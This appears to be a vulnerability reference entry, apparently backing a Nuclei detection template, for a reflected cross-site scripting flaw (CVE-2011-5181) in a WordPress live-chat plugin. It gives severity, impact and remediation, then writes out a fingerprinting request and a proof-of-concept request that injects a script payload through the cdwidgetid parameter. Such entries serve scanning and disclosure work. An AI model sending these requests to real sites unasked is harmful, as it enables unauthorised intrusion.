| Title | ClickDesk Live Support Live Chat 2.0 - Cross-Site Scripting |
|---|---|
| Author | daffainfo |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information. |
| Remediation | Update to the latest version of the ClickDesk Live Support Live Chat plugin to mitigate the XSS vulnerability. |
| CVSS Score | 4.3 |
| EPSS Score | 0.01422 |
| CVE ID | CVE-2011-5181 |
| CWE ID | CWE-79 |
| Tags | cve2011 cve wordpress xss wp-plugin clickdesk vuln |
A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter.
GET /wp-content/plugins/clickdesk-live-support-chat/readme.txt HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
GET /wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2011/CVE-2011-5181.yaml
🦈 Packet Capture: ⬇️ Download cve-2011-5181.pcap
N/AN/A